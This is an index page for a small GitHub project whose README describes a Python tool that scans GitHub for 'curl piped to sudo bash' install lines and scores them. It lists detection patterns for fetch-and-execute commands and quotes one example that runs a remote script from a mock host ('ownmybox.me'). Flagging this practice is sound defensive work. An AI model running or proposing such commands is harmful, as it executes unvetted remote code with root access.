Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/infoforcefeed/curl2sudo
Python 3 and a lot of disdain.
https://github.com/infoforcefeed/curl2sudo
Last synced: about 2 months ago
JSON representation
Python 3 and a lot of disdain.
- Host: GitHub
- URL: https://github.com/infoforcefeed/curl2sudo
- Owner: infoforcefeed
- Created: 2014-01-03T03:07:54.000Z (about 11 years ago)
- Default Branch: master
- Last Pushed: 2014-01-03T03:21:49.000Z (about 11 years ago)
- Last Synced: 2024-03-25T21:52:28.026Z (10 months ago)
- Language: Python
- Size: 121 KB
- Stars: 2
- Watchers: 4
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
This is a Python3 project that looks on github for offending curl2sudo lines
and dumps them to offenders.json.
The score is computed based on how 'bad' it is and is almost complete arbitrary.
Notes
=====
Properties that an offender probably has:
* curl or wget at the beginning of the line
* http or https somewhere in the line
* a bash or sh at the end
* a pipe symbol between the curl/wget and the bash/sh
Properties an offender may have:
* Fancy execution `bash < <(curl https://ownmybox.me/install.sh)`
* $1 or other weird ways to get an arbitrary URL
Properties and offender gets bonus points for:
* Having a sudo in the line (!!!)
* su somewhere in the line (less likely)